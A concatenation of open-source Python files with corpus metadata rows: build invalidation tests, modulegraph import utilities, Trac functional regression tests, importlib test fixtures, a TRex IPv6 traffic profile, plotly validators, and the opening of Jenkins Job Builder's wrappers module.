print('[%s]' % ' '.join(strs))
# Verify basic data structure soundness.
all_vts = self.cache_manager.wrap_targets(targets)
invalid_vts = filter(lambda vt: not vt.valid, all_vts)
self.assertEquals(5, len(invalid_vts))
self.assertEquals(5, len(all_vts))
vts_targets = [vt.targets[0] for vt in all_vts]
self.assertEquals(set(targets), set(vts_targets))
# Test a simple partition.
ic = InvalidationCheck(all_vts, [], 3)
partitioned = ic.all_vts_partitioned
print_partitions(partitioned)
# Several correct partitionings are possible, but in all cases 4 1-source targets will be
# added to the first partition before it exceeds the limit of 3, and the final target will
# be in a partition by itself.
self.assertEquals(2, len(partitioned))
self.assertEquals(4, len(partitioned[0].targets))
self.assertEquals(1, len(partitioned[1].targets))
# Test partition with colors.
red = 'red'
blue = 'blue'
colors = {
a: blue,
b: red,
c: red,
d: red,
e: blue
}
# As a reference, we partition without colors.
ic = InvalidationCheck(all_vts, [], 2)
partitioned = ic.all_vts_partitioned
print_partitions(partitioned)
self.assertEquals(2, len(partitioned))
self.assertEquals(3, len(partitioned[0].targets))
self.assertEquals(2, len(partitioned[1].targets))
# Now apply color restrictions.
ic = InvalidationCheck(all_vts, [], 2, target_colors=colors)
partitioned = ic.all_vts_partitioned
print_partitions(partitioned)
self.assertEquals(3, len(partitioned))
self.assertEquals(1, len(partitioned[0].targets))
self.assertEquals(3, len(partitioned[1].targets))
self.assertEquals(1, len(partitioned[2].targets))
| 36.65625 | 148 | 0.705882 |
acf6bc135a4f96058ae1351214cb3983b530807b | 3,171 | py | Python | telemetry/third_party/modulegraph/modulegraph/util.py | tingshao/catapult | a8fe19e0c492472a8ed5710be9077e24cc517c5c | [
"BSD-3-Clause"
] | 2,151 | 2020-04-18T07:31:17.000Z | 2022-03-31T08:39:18.000Z | telemetry/third_party/modulegraph/modulegraph/util.py | tingshao/catapult | a8fe19e0c492472a8ed5710be9077e24cc517c5c | [
"BSD-3-Clause"
] | 395 | 2020-04-18T08:22:18.000Z | 2021-12-08T13:04:49.000Z | telemetry/third_party/modulegraph/modulegraph/util.py | tingshao/catapult | a8fe19e0c492472a8ed5710be9077e24cc517c5c | [
"BSD-3-Clause"
] | 338 | 2020-04-18T08:03:10.000Z | 2022-03-29T12:33:22.000Z | from __future__ import absolute_import
import os
import imp
import sys
import re
import marshal
import warnings
try:
unicode
except NameError:
unicode = str
if sys.version_info[0] == 2:
from StringIO import StringIO as BytesIO
from StringIO import StringIO
else:
from io import BytesIO, StringIO
def imp_find_module(name, path=None):
"""
same as imp.find_module, but handles dotted names
"""
names = name.split('.')
if path is not None:
if isinstance(path, (str, unicode)):
path = [os.path.realpath(path)]
for name in names:
result = imp.find_module(name, path)
if result[0] is not None:
result[0].close()
path = [result[1]]
return result
def _check_importer_for_path(name, path_item):
try:
importer = sys.path_importer_cache[path_item]
except KeyError:
for path_hook in sys.path_hooks:
try:
importer = path_hook(path_item)
break
except ImportError:
pass
else:
importer = None
sys.path_importer_cache.setdefault(path_item, importer)
if importer is None:
try:
return imp.find_module(name, [path_item])
except ImportError:
return None
return importer.find_module(name)
def imp_walk(name):
"""
yields namepart, tuple_or_importer for each path item
raise ImportError if a name can not be found.
"""
warnings.warn("imp_walk will be removed in a future version", DeprecationWarning)
if name in sys.builtin_module_names:
yield name, (None, None, ("", "", imp.C_BUILTIN))
return
paths = sys.path
res = None
for namepart in name.split('.'):
for path_item in paths:
res = _check_importer_for_path(namepart, path_item)
if hasattr(res, 'load_module'):
if res.path.endswith('.py') or res.path.endswith('.pyw'):
fp = StringIO(res.get_source(namepart))
res = (fp, res.path, ('.py', 'rU', imp.PY_SOURCE))
elif res.path.endswith('.pyc') or res.path.endswith('.pyo'):
co = res.get_code(namepart)
fp = BytesIO(imp.get_magic() + b'\0\0\0\0' + marshal.dumps(co))
res = (fp, res.path, ('.pyc', 'rb', imp.PY_COMPILED))
else:
res = (None, loader.path, (os.path.splitext(loader.path)[-1], 'rb', imp.C_EXTENSION))
break
elif isinstance(res, tuple):
break
else:
break
yield namepart, res
paths = [os.path.join(path_item, namepart)]
else:
return
raise ImportError('No module named %s' % (name,))
cookie_re = re.compile(b"coding[:=]\s*([-\w.]+)")
if sys.version_info[0] == 2:
default_encoding = 'ascii'
else:
default_encoding = 'utf-8'
def guess_encoding(fp):
for i in range(2):
ln = fp.readline()
m = cookie_re.search(ln)
if m is not None:
return m.group(1).decode('ascii')
return default_encoding
| 26.425 | 105 | 0.577105 |
acf6bc2790e65582c2f0415f2eaacf439a83d112 | 16,156 | py | Python | trac/tests/functional/testcases.py | haskell-infra/trac | 5e086948718893ede9965ea4ce3625da32676730 | [
"BSD-3-Clause"
] | null | null | null | trac/tests/functional/testcases.py | haskell-infra/trac | 5e086948718893ede9965ea4ce3625da32676730 | [
"BSD-3-Clause"
] | 1 | 2019-03-20T19:13:53.000Z | 2019-08-14T20:15:09.000Z | trac/tests/functional/testcases.py | haskell-infra/trac | 5e086948718893ede9965ea4ce3625da32676730 | [
"BSD-3-Clause"
] | 2 | 2019-03-20T01:23:30.000Z | 2019-12-06T16:13:07.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2008-2013 Edgewall Software
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://trac.edgewall.org/wiki/TracLicense.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://trac.edgewall.org/log/.
import os
import re
import time
import unittest
from trac.tests.functional import FunctionalTwillTestCaseSetup, \
internal_error, tc
from trac.util import create_file
class TestAttachmentNonexistentParent(FunctionalTwillTestCaseSetup):
def runTest(self):
"""TracError should be raised when navigating to the attachment
page for a nonexistent resource."""
self._tester.go_to_wiki('NonexistentPage')
tc.find("The page <strong>NonexistentPage</strong> does not exist. "
"You can create it here.")
tc.find(r"\bCreate this page\b")
tc.go(self._tester.url + '/attachment/wiki/NonexistentPage')
tc.find('<h1>Trac Error</h1>\s+<p class="message">'
'Parent resource NonexistentPage doesn\'t exist</p>')
class TestAboutPage(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Validate the About page."""
tc.follow(r"\bAbout Trac\b")
tc.find(r"<h1>About Trac</h1>")
tc.find(r"<h2>System Information</h2>")
tc.find(r"<h2>Configuration</h2>")
class TestErrorPage(FunctionalTwillTestCaseSetup):
"""Validate the error page.
Defects reported to trac-hacks should use the Component defined in the
plugin's URL (#11434).
"""
def runTest(self):
env = self._testenv.get_trac_environment()
env.config.set('components', 'RaiseExceptionPlugin.*', 'enabled')
env.config.save()
create_file(os.path.join(env.plugins_dir, 'RaiseExceptionPlugin.py'),
"""\
from trac.core import Component, implements
from trac.web.api import IRequestHandler
url = None
class RaiseExceptionPlugin(Component):
implements(IRequestHandler)
def match_request(self, req):
if req.path_info.startswith('/raise-exception'):
return True
def process_request(self, req):
if req.args.get('report') == 'tho':
global url
url = 'http://trac-hacks.org/wiki/HelloWorldMacro'
raise Exception
""")
self._testenv.restart()
try:
tc.go(self._tester.url + '/raise-exception')
tc.find(internal_error)
tc.find('<form class="newticket" method="get" '
'action="https://trac.edgewall.org/newticket">')
tc.go(self._tester.url + '/raise-exception?report=tho')
tc.find(internal_error)
tc.find('<form class="newticket" method="get" '
'action="http://trac-hacks.org/newticket">')
tc.find('<input type="hidden" name="component" '
'value="HelloWorldMacro" />')
finally:
env.config.set('components', 'RaiseExceptionPlugin.*', 'disabled')
class RegressionTestRev6017(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of the plugin reload fix in r6017"""
# Setup the DeleteTicket plugin
env = self._testenv.get_trac_environment()
plugin = open(os.path.join(self._testenv.trac_src,
'sample-plugins', 'workflow',
'DeleteTicket.py')).read()
plugin_path = os.path.join(env.plugins_dir, 'DeleteTicket.py')
open(plugin_path, 'w').write(plugin)
prevconfig = env.config.get('ticket', 'workflow')
env.config.set('ticket', 'workflow',
prevconfig + ',DeleteTicketActionController')
env.config.save()
env = self._testenv.get_trac_environment() # reloads the environment
loaded_components = env.compmgr.__metaclass__._components
delete_plugins = [c for c in loaded_components
if 'DeleteTicketActionController' in c.__name__]
try:
self.assertEqual(len(delete_plugins), 1,
"Plugin loaded more than once.")
finally:
# Remove the DeleteTicket plugin
env.config.set('ticket', 'workflow', prevconfig)
env.config.save()
for ext in ('py', 'pyc', 'pyo'):
filename = os.path.join(env.plugins_dir,
'DeleteTicket.%s' % ext)
if os.path.exists(filename):
os.unlink(filename)
class RegressionTestTicket3833a(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/3833 a"""
env = self._testenv.get_trac_environment()
# Assume the logging is already set to debug.
traclogfile = open(os.path.join(env.log_dir, 'trac.log'))
# Seek to the end of file so we only look at new log output
traclogfile.seek(0, 2)
# Verify that logging is on initially
env.log.debug("RegressionTestTicket3833 debug1")
debug1 = traclogfile.read()
self.assertNotEqual(debug1.find("RegressionTestTicket3833 debug1"), -1,
'Logging off when it should have been on.\n%r'
% debug1)
class RegressionTestTicket3833b(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/3833 b"""
# Turn logging off, try to log something, and verify that it does
# not show up.
env = self._testenv.get_trac_environment()
traclogfile = open(os.path.join(env.log_dir, 'trac.log'))
# Seek to the end of file so we only look at new log output
traclogfile.seek(0, 2)
env.config.set('logging', 'log_level', 'INFO')
env.config.save()
env = self._testenv.get_trac_environment()
env.log.debug("RegressionTestTicket3833 debug2")
env.log.info("RegressionTestTicket3833 info2")
debug2 = traclogfile.read()
self.assertNotEqual(debug2.find("RegressionTestTicket3833 info2"), -1,
'Logging at info failed.\n%r' % debug2)
self.assertEqual(debug2.find("RegressionTestTicket3833 debug2"), -1,
'Logging still on when it should have been off.\n%r'
% debug2)
class RegressionTestTicket3833c(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/3833 c"""
# Turn logging back on, try to log something, and verify that it
# does show up.
env = self._testenv.get_trac_environment()
traclogfile = open(os.path.join(env.log_dir, 'trac.log'))
# Seek to the end of file so we only look at new log output
traclogfile.seek(0, 2)
env.config.set('logging', 'log_level', 'DEBUG')
time.sleep(2)
env.config.save()
#time.sleep(2)
env = self._testenv.get_trac_environment()
#time.sleep(2)
env.log.debug("RegressionTestTicket3833 debug3")
env.log.info("RegressionTestTicket3833 info3")
#time.sleep(2)
debug3 = traclogfile.read()
message = ''
success = debug3.find("RegressionTestTicket3833 debug3") != -1
if not success:
# Ok, the testcase failed, but we really need logging enabled.
env.log.debug("RegressionTestTicket3833 fixup3")
fixup3 = traclogfile.read()
message = 'Logging still off when it should have been on.\n' \
'%r\n%r' % (debug3, fixup3)
self.assertTrue(success, message)
class RegressionTestTicket5572(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/5572"""
# TODO: this ticket (implemented in r6011) adds a new feature to
# make the progress bar more configurable. We need to test this
# new configurability.
class RegressionTestTicket7209(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/7209"""
ticketid = self._tester.create_ticket()
self._tester.create_ticket()
self._tester.add_comment(ticketid)
self._tester.attach_file_to_ticket(ticketid, filename='hello.txt',
description='Preserved Descr')
self._tester.go_to_ticket(ticketid)
tc.find('Preserved Descr')
# Now replace the existing attachment, and the description should come
# through.
self._tester.attach_file_to_ticket(ticketid, filename='hello.txt',
description='', replace=True)
self._tester.go_to_ticket(ticketid)
tc.find('Preserved Descr')
self._tester.attach_file_to_ticket(ticketid, filename='blah.txt',
description='Second Attachment')
self._tester.go_to_ticket(ticketid)
tc.find('Second Attachment')
# This one should get a new description when it's replaced
# (Second->Other)
self._tester.attach_file_to_ticket(ticketid, filename='blah.txt',
description='Other Attachment',
replace=True)
self._tester.go_to_ticket(ticketid)
tc.find('Other Attachment')
tc.notfind('Second Attachment')
class RegressionTestTicket9880(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/9880
Upload of a file which the browsers associates a Content-Type
of multipart/related (e.g. an .mht file) should succeed.
"""
ticketid = self._tester.create_ticket()
self._tester.create_ticket()
self._tester.attach_file_to_ticket(ticketid, filename='hello.mht',
content_type='multipart/related',
data="""
Well, the actual content of the file doesn't matter, the problem is
related to the "multipart/..." content_type associated to the file.
See also http://bugs.python.org/issue15564.
""")
class RegressionTestTicket3663(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Regression test for non-UTF-8 PATH_INFO (#3663)
Verify that URLs not encoded with UTF-8 are reported as invalid.
"""
# invalid PATH_INFO
self._tester.go_to_wiki(u'été'.encode('latin1'))
tc.code(404)
tc.find('Invalid URL encoding')
# invalid SCRIPT_NAME
tc.go(u'été'.encode('latin1'))
tc.code(404)
tc.find('Invalid URL encoding')
class RegressionTestTicket6318(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Regression test for non-ascii usernames (#6318)
"""
# first do a logout, otherwise we might end up logged in as
# admin again, as this is the first thing the tester does.
# ... but even before that we need to make sure we're coming
# from a valid URL, which is not the case if we're just coming
# from the above test! ('/wiki/\xE9t\xE9')
self._tester.go_to_front()
self._tester.logout()
try:
# also test a regular ascii user name
self._testenv.adduser(u'user')
self._tester.login(u'user')
self._tester.go_to_front()
self._tester.logout()
# now test utf-8 user name
self._testenv.adduser(u'joé')
self._tester.login(u'joé')
self._tester.go_to_front()
# when failed to retrieve session, FakeSession() and FakePerm()
# are used and the req.perm has no permissions.
tc.notfind(internal_error)
tc.notfind("You don't have the required permissions")
self._tester.logout()
# finally restore expected 'admin' login
self._tester.login('admin')
finally:
self._testenv.deluser(u'joé')
class RegressionTestTicket11434(FunctionalTwillTestCaseSetup):
"""Test for regression of http://trac.edgewall.org/ticket/11434
Defects reported to trac-hacks should use the Component defined in the
plugin's URL.
"""
def runTest(self):
env = self._testenv.get_trac_environment()
env.config.set('components', 'RaiseExceptionPlugin.*', 'enabled')
env.config.save()
create_file(os.path.join(env.plugins_dir, 'RaiseExceptionPlugin.py'),
"""\
from trac.core import Component, implements
from trac.web.api import IRequestHandler
url = 'http://trac-hacks.org/wiki/HelloWorldMacro'
class RaiseExceptionPlugin(Component):
implements(IRequestHandler)
def match_request(self, req):
if req.path_info == '/raise-exception':
return True
def process_request(self, req):
raise Exception
""")
try:
tc.go(self._tester.url + '/raise-exception')
tc.find(internal_error)
tc.find('<form class="newticket" method="get" '
'action="http://trac-hacks.org/newticket">')
tc.find('<input type="hidden" name="component" '
'value="HelloWorldMacro" />')
finally:
env.config.set('components', 'RaiseExceptionPlugin.*', 'disabled')
class RegressionTestTicket11503a(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/11503 a"""
base = self._tester.url
tc.go(base + '/notf%C5%91und/')
tc.notfind(internal_error)
tc.url(re.escape(base + '/notf%C5%91und') + r'\Z')
tc.go(base + '/notf%C5%91und/?type=def%C3%A9ct')
tc.notfind(internal_error)
tc.url(re.escape(base + '/notf%C5%91und?type=def%C3%A9ct') + r'\Z')
tc.go(base + '/notf%C5%91und/%252F/?type=%252F')
tc.notfind(internal_error)
tc.url(re.escape(base + '/notf%C5%91und/%252F?type=%252F') + r'\Z')
class RegressionTestTicket11503b(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/11503 b"""
env = self._testenv.get_trac_environment()
try:
env.config.set('mainnav', 'wiki.href',
u'/wiki/SändBõx?action=history&blah=%252F')
env.config.save()
# reloads the environment
env = self._testenv.get_trac_environment()
self._tester.go_to_front()
tc.notfind(internal_error)
tc.find(' href="/wiki/S%C3%A4ndB%C3%B5x\?'
'action=history&blah=%252F"')
finally:
env.config.remove('mainnav', 'wiki.href')
env.config.save()
def functionalSuite(suite=None):
if not suite:
import trac.tests.functional
suite = trac.tests.functional.functionalSuite()
suite.addTest(TestAttachmentNonexistentParent())
suite.addTest(TestAboutPage())
suite.addTest(TestErrorPage())
suite.addTest(RegressionTestRev6017())
suite.addTest(RegressionTestTicket3833a())
suite.addTest(RegressionTestTicket3833b())
suite.addTest(RegressionTestTicket3833c())
suite.addTest(RegressionTestTicket5572())
suite.addTest(RegressionTestTicket7209())
suite.addTest(RegressionTestTicket9880())
suite.addTest(RegressionTestTicket3663())
suite.addTest(RegressionTestTicket6318())
suite.addTest(RegressionTestTicket11434())
suite.addTest(RegressionTestTicket11503a())
suite.addTest(RegressionTestTicket11503b())
return suite
test_suite = functionalSuite
if __name__ == '__main__':
unittest.main(defaultTest='test_suite')
| 39.309002 | 79 | 0.62565 |
acf6bc87c74e9dc1a01195880c5442cf7b791be5 | 6,885 | py | Python | Lib/test/test_importlib/fixtures.py | eldipa/cpython | 0d6bd1ca7c683137d52041194f3a2b02219f225a | [
"0BSD"
] | 2 | 2019-06-07T17:28:28.000Z | 2020-09-24T21:41:14.000Z | Lib/test/test_importlib/fixtures.py | eldipa/cpython | 0d6bd1ca7c683137d52041194f3a2b02219f225a | [
"0BSD"
] | 50 | 2020-01-07T19:11:11.000Z | 2022-03-01T14:40:03.000Z | Lib/test/test_importlib/fixtures.py | thomboroboto/cpyth | 7375b42fe8ac3562f5179ca5a6edcffda578ce35 | [
"0BSD"
] | 4 | 2018-07-13T08:20:36.000Z | 2020-09-28T18:02:05.000Z | import os
import sys
import shutil
import pathlib
import tempfile
import textwrap
import contextlib
import unittest
from test.support.os_helper import FS_NONASCII
from typing import Dict, Union
@contextlib.contextmanager
def tempdir():
tmpdir = tempfile.mkdtemp()
try:
yield pathlib.Path(tmpdir)
finally:
shutil.rmtree(tmpdir)
@contextlib.contextmanager
def save_cwd():
orig = os.getcwd()
try:
yield
finally:
os.chdir(orig)
@contextlib.contextmanager
def tempdir_as_cwd():
with tempdir() as tmp:
with save_cwd():
os.chdir(str(tmp))
yield tmp
@contextlib.contextmanager
def install_finder(finder):
sys.meta_path.append(finder)
try:
yield
finally:
sys.meta_path.remove(finder)
class Fixtures:
def setUp(self):
self.fixtures = contextlib.ExitStack()
self.addCleanup(self.fixtures.close)
class SiteDir(Fixtures):
def setUp(self):
super(SiteDir, self).setUp()
self.site_dir = self.fixtures.enter_context(tempdir())
class OnSysPath(Fixtures):
@staticmethod
@contextlib.contextmanager
def add_sys_path(dir):
sys.path[:0] = [str(dir)]
try:
yield
finally:
sys.path.remove(str(dir))
def setUp(self):
super(OnSysPath, self).setUp()
self.fixtures.enter_context(self.add_sys_path(self.site_dir))
# Except for python/mypy#731, prefer to define
# FilesDef = Dict[str, Union['FilesDef', str]]
FilesDef = Dict[str, Union[Dict[str, Union[Dict[str, str], str]], str]]
class DistInfoPkg(OnSysPath, SiteDir):
files: FilesDef = {
"distinfo_pkg-1.0.0.dist-info": {
"METADATA": """
Name: distinfo-pkg
Author: Steven Ma
Version: 1.0.0
Requires-Dist: wheel >= 1.0
Requires-Dist: pytest; extra == 'test'
""",
"RECORD": "mod.py,sha256=abc,20\n",
"entry_points.txt": """
[entries]
main = mod:main
ns:sub = mod:main
""",
},
"mod.py": """
def main():
print("hello world")
""",
}
def setUp(self):
super(DistInfoPkg, self).setUp()
build_files(DistInfoPkg.files, self.site_dir)
class DistInfoPkgWithDot(OnSysPath, SiteDir):
files: FilesDef = {
"pkg_dot-1.0.0.dist-info": {
"METADATA": """
Name: pkg.dot
Version: 1.0.0
""",
},
}
def setUp(self):
super(DistInfoPkgWithDot, self).setUp()
build_files(DistInfoPkgWithDot.files, self.site_dir)
class DistInfoPkgWithDotLegacy(OnSysPath, SiteDir):
files: FilesDef = {
"pkg.dot-1.0.0.dist-info": {
"METADATA": """
Name: pkg.dot
Version: 1.0.0
""",
},
"pkg.lot.egg-info": {
"METADATA": """
Name: pkg.lot
Version: 1.0.0
""",
},
}
def setUp(self):
super(DistInfoPkgWithDotLegacy, self).setUp()
build_files(DistInfoPkgWithDotLegacy.files, self.site_dir)
class DistInfoPkgOffPath(SiteDir):
def setUp(self):
super(DistInfoPkgOffPath, self).setUp()
build_files(DistInfoPkg.files, self.site_dir)
class EggInfoPkg(OnSysPath, SiteDir):
files: FilesDef = {
"egginfo_pkg.egg-info": {
"PKG-INFO": """
Name: egginfo-pkg
Author: Steven Ma
License: Unknown
Version: 1.0.0
Classifier: Intended Audience :: Developers
Classifier: Topic :: Software Development :: Libraries
""",
"SOURCES.txt": """
mod.py
egginfo_pkg.egg-info/top_level.txt
""",
"entry_points.txt": """
[entries]
main = mod:main
""",
"requires.txt": """
wheel >= 1.0; python_version >= "2.7"
[test]
pytest
""",
"top_level.txt": "mod\n",
},
"mod.py": """
def main():
print("hello world")
""",
}
def setUp(self):
super(EggInfoPkg, self).setUp()
build_files(EggInfoPkg.files, prefix=self.site_dir)
class EggInfoFile(OnSysPath, SiteDir):
files: FilesDef = {
"egginfo_file.egg-info": """
Metadata-Version: 1.0
Name: egginfo_file
Version: 0.1
Summary: An example package
Home-page: www.example.com
Author: Eric Haffa-Vee
Author-email: eric@example.coms
License: UNKNOWN
Description: UNKNOWN
Platform: UNKNOWN
""",
}
def setUp(self):
super(EggInfoFile, self).setUp()
build_files(EggInfoFile.files, prefix=self.site_dir)
class LocalPackage:
files: FilesDef = {
"setup.py": """
import setuptools
setuptools.setup(name="local-pkg", version="2.0.1")
""",
}
def setUp(self):
self.fixtures = contextlib.ExitStack()
self.addCleanup(self.fixtures.close)
self.fixtures.enter_context(tempdir_as_cwd())
build_files(self.files)
def build_files(file_defs, prefix=pathlib.Path()):
"""Build a set of files/directories, as described by the
file_defs dictionary. Each key/value pair in the dictionary is
interpreted as a filename/contents pair. If the contents value is a
dictionary, a directory is created, and the dictionary interpreted
as the files within it, recursively.
For example:
{"README.txt": "A README file",
"foo": {
"__init__.py": "",
"bar": {
"__init__.py": "",
},
"baz.py": "# Some code",
}
}
"""
for name, contents in file_defs.items():
full_name = prefix / name
if isinstance(contents, dict):
full_name.mkdir()
build_files(contents, prefix=full_name)
else:
if isinstance(contents, bytes):
with full_name.open('wb') as f:
f.write(contents)
else:
with full_name.open('w') as f:
f.write(DALS(contents))
class FileBuilder:
def unicode_filename(self):
return FS_NONASCII or self.skip("File system does not support non-ascii.")
def skip(self, reason):
raise unittest.SkipTest(reason)
def DALS(str):
"Dedent and left-strip"
return textwrap.dedent(str).lstrip()
class NullFinder:
def find_module(self, name):
pass
| 25.036364 | 82 | 0.543065 |
acf6bccc165665efa01ba2923af7c3ff329f7305 | 3,774 | py | Python | resources/traffic_profiles/trex/trex-sl-2n-dot1qip6asym-ip6src253.py | preym17/csit | 3151c98618c78e3782e48bbe4d9c8f906c126f69 | [
"Apache-2.0"
] | null | null | null | resources/traffic_profiles/trex/trex-sl-2n-dot1qip6asym-ip6src253.py | preym17/csit | 3151c98618c78e3782e48bbe4d9c8f906c126f69 | [
"Apache-2.0"
] | null | null | null | resources/traffic_profiles/trex/trex-sl-2n-dot1qip6asym-ip6src253.py | preym17/csit | 3151c98618c78e3782e48bbe4d9c8f906c126f69 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2019 Cisco and/or its affiliates.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Stream profile for T-rex traffic generator.
Stream profile:
- Two streams sent in directions 0 --> 1 and 1 --> 0 at the same time.
- Direction 0 --> 1:
- Packet: ETH / IPv6 /
- Source IP address range: 2001:1::2 - 2001:1::FE
- Destination IP address range: 2001:2::2
- Direction 1 --> 0:
- Packet: ETH / DOT1Q / IPv6 /
- Source IP address range: 2001:2::2 - 2001:2::FE
- Destination IP address range: 2001:1::2
"""
from trex.stl.api import *
from profile_trex_stateless_base_class import TrafficStreamsBaseClass
class TrafficStreams(TrafficStreamsBaseClass):
"""Stream profile."""
def __init__(self):
"""Initialization and setting of streams' parameters."""
super(TrafficStreamsBaseClass, self).__init__()
# VLAN ID
self.vlan_id = 10
# IPs used in packet headers.
self.p1_src_start_ip = '2001:1::2'
self.p1_src_end_ip = '2001:1::FE'
self.p1_dst_start_ip = '2001:2::2'
self.p2_src_start_ip = '2001:2::2'
self.p2_src_end_ip = '2001:2::FE'
self.p2_dst_start_ip = '2001:1::2'
def define_packets(self):
"""Defines the packets to be sent from the traffic generator.
Packet definition: | ETH | IPv6 |
:returns: Packets to be sent from the traffic generator.
:rtype: tuple
"""
base_p1, count_p1 = self._get_start_end_ipv6(self.p1_src_start_ip,
self.p1_src_end_ip)
base_p2, count_p2 = self._get_start_end_ipv6(self.p2_src_start_ip,
self.p2_src_end_ip)
# Direction 0 --> 1
base_pkt_a = (Ether() /
IPv6(src=self.p1_src_start_ip,
dst=self.p1_dst_start_ip))
# Direction 1 --> 0
base_pkt_b = (Ether() /
Dot1Q(vlan=self.vlan_id) /
IPv6(src=self.p2_src_start_ip,
dst=self.p2_dst_start_ip))
# Direction 0 --> 1
vm1 = STLScVmRaw([STLVmFlowVar(name="ipv6_src",
min_value=base_p1,
max_value=base_p1 + count_p1,
size=8, op="inc"),
STLVmWrFlowVar(fv_name="ipv6_src",
pkt_offset="IPv6.src",
offset_fixup=8)])
# Direction 1 --> 0
vm2 = STLScVmRaw([STLVmFlowVar(name="ipv6_src",
min_value=base_p2,
max_value=base_p2 + count_p2,
size=8, op="inc"),
STLVmWrFlowVar(fv_name="ipv6_src",
pkt_offset="IPv6.src",
offset_fixup=8)])
return base_pkt_a, base_pkt_b, vm1, vm2
def register():
"""Register this traffic profile to T-rex.
Do not change this function.
:returns: Traffic streams.
:rtype: Object
"""
return TrafficStreams()
| 35.942857 | 74 | 0.552199 |
acf6c173d895faeff4e29965cf6f52da1afa67b9 | 1,317 | py | Python | packages/python/plotly/plotly/validators/parcoords/line/__init__.py | labaran1/plotly.py | 7ec751e8fed4a570c11ea4bea2231806389d62eb | [
"MIT"
] | null | null | null | packages/python/plotly/plotly/validators/parcoords/line/__init__.py | labaran1/plotly.py | 7ec751e8fed4a570c11ea4bea2231806389d62eb | [
"MIT"
] | null | null | null | packages/python/plotly/plotly/validators/parcoords/line/__init__.py | labaran1/plotly.py | 7ec751e8fed4a570c11ea4bea2231806389d62eb | [
"MIT"
] | null | null | null | import sys
from typing import TYPE_CHECKING
if sys.version_info < (3, 7) or TYPE_CHECKING:
from ._showscale import ShowscaleValidator
from ._reversescale import ReversescaleValidator
from ._colorsrc import ColorsrcValidator
from ._colorscale import ColorscaleValidator
from ._colorbar import ColorbarValidator
from ._coloraxis import ColoraxisValidator
from ._color import ColorValidator
from ._cmin import CminValidator
from ._cmid import CmidValidator
from ._cmax import CmaxValidator
from ._cauto import CautoValidator
from ._autocolorscale import AutocolorscaleValidator
else:
from _plotly_utils.importers import relative_import
__all__, __getattr__, __dir__ = relative_import(
__name__,
[],
[
"._showscale.ShowscaleValidator",
"._reversescale.ReversescaleValidator",
"._colorsrc.ColorsrcValidator",
"._colorscale.ColorscaleValidator",
"._colorbar.ColorbarValidator",
"._coloraxis.ColoraxisValidator",
"._color.ColorValidator",
"._cmin.CminValidator",
"._cmid.CmidValidator",
"._cmax.CmaxValidator",
"._cauto.CautoValidator",
"._autocolorscale.AutocolorscaleValidator",
],
)
| 34.657895 | 56 | 0.682612 |
acf6c1fc3701b6b5f1839a227f55be0c2302a091 | 99,140 | py | Python | jenkins_jobs/modules/wrappers.py | beaker-project/jenkins-job-builder | 324e0197c4deb2a515351ae48fbc9cfa58920117 | [
"Apache-2.0"
] | null | null | null | jenkins_jobs/modules/wrappers.py | beaker-project/jenkins-job-builder | 324e0197c4deb2a515351ae48fbc9cfa58920117 | [
"Apache-2.0"
] | 1 | 2018-02-21T05:34:32.000Z | 2018-02-27T23:51:41.000Z | jenkins_jobs/modules/wrappers.py | beaker-project/jenkins-job-builder | 324e0197c4deb2a515351ae48fbc9cfa58920117 | [
"Apache-2.0"
] | null | null | null | # Copyright 2012 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Wrappers can alter the way the build is run as well as the build output.
**Component**: wrappers
:Macro: wrapper
:Entry Point: jenkins_jobs.wrappers
"""
import logging
import pkg_resources
import sys
import xml.etree.ElementTree as XML
from jenkins_jobs.errors import InvalidAttributeError
from jenkins_jobs.errors import JenkinsJobsException
import jenkins_jobs.modules.base
from jenkins_jobs.modules.builders import create_builders
from jenkins_jobs.modules.helpers import artifactory_common_details
from jenkins_jobs.modules.helpers import artifactory_deployment_patterns
from jenkins_jobs.modules.helpers import artifactory_env_vars_patterns
from jenkins_jobs.modules.helpers import artifactory_optional_props
from jenkins_jobs.modules.helpers import artifactory_repository
from jenkins_jobs.modules.helpers import config_file_provider_builder
from jenkins_jobs.modules.helpers import convert_mapping_to_xml
logger = logging.getLogger(__name__)
MIN_TO_SEC = 60
def docker_custom_build_env(registry, xml_parent, data):
"""yaml: docker-custom-build-env
Allows the definition of a build environment for a job using a Docker
container.
Requires the Jenkins :jenkins-wiki:`CloudBees Docker Custom Build
Environment Plugin<CloudBees+Docker+Custom+Build+Environment+Plugin>`.
:arg str image-type: Docker image type. Valid values and their
additional attributes described in the image_types_ table
